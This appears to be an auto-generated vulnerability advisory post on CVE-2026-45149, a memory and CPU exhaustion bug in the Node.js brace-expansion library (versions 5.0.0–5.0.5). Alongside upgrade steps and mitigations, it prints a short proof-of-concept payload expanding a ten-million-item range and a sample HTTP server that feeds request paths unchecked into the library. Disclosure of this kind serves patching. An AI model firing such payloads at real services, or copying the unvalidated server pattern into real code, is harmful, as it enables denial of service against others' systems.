Listen to this Post
How CVE-2026-45149 works:
The brace-expansion Node.js library provides brace expansion similar to bash. It accepts a `max` option to cap the number of expanded items. The vulnerability arises when expanding a single large numeric range (e.g., {1..10000000}). The `max` check is applied after the entire sequence has been generated, not during the generation loop. Consequently, even with max=10, the loop still iterates 10 million times, building a full intermediate array. This allocates roughly 505 MB of memory and consumes about 800 ms of CPU time. The `max` limit is enforced only at the output combination step, which is too late to prevent the resource-heavy generation. The issue affects versions 5.0.0 through 5.0.5. Version 5.0.6 fixes it by moving the `max` check earlier in the loop, stopping further expansion once the limit is reached. An attacker can provide a crafted brace pattern with an enormous range to exhaust memory and CPU, causing a denial of service.
dailycve form:
Platform: brace-expansion
Version: Versions 5.0.0-5.0.5
Vulnerability: max bypass DoS
Severity: Moderate
date: May 18 2026
Prediction: Patch available now
What Undercode Say:
Analytics:
Check current version npm list brace-expansion Update to patched version npm install [email protected] Verify patch npm list brace-expansion | grep 5.0.6 Proof of concept (Node.js) node -e "const expand = require('brace-expansion'); console.time('expand'); expand('{1..10000000}', {max:10}); console.timeEnd('expand'); console.log('Memory:', process.memoryUsage().heapUsed / 1024 / 1024, 'MB')"
Exploit:
// Attack payload: large numeric range with max bypass
const expand = require('brace-expansion');
expand('{1..10000000}', { max: 10 }); // Still allocates ~505 MB
HTTP server vulnerable to DoS:
const http = require('http');
const expand = require('brace-expansion');
http.createServer((req, res) => {
const pattern = req.url.slice(1); // e.g., /{1..10000000}
expand(pattern, { max: 10 }); // Triggers heavy allocation
res.end('done');
}).listen(3000);
Protection from this CVE:
- Upgrade to `[email protected]` or later.
- Validate input patterns; reject overly large ranges.
- Use a wrapper with a timeout for expansion.
- Limit the length of the input string.
- Apply a process-level memory limit (e.g.,
--max-old-space-size).
Impact:
- Denial of service via memory exhaustion (up to 505 MB per request).
- High CPU consumption (≈800 ms per expansion).
- Application unresponsiveness or crash under repeated attacks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

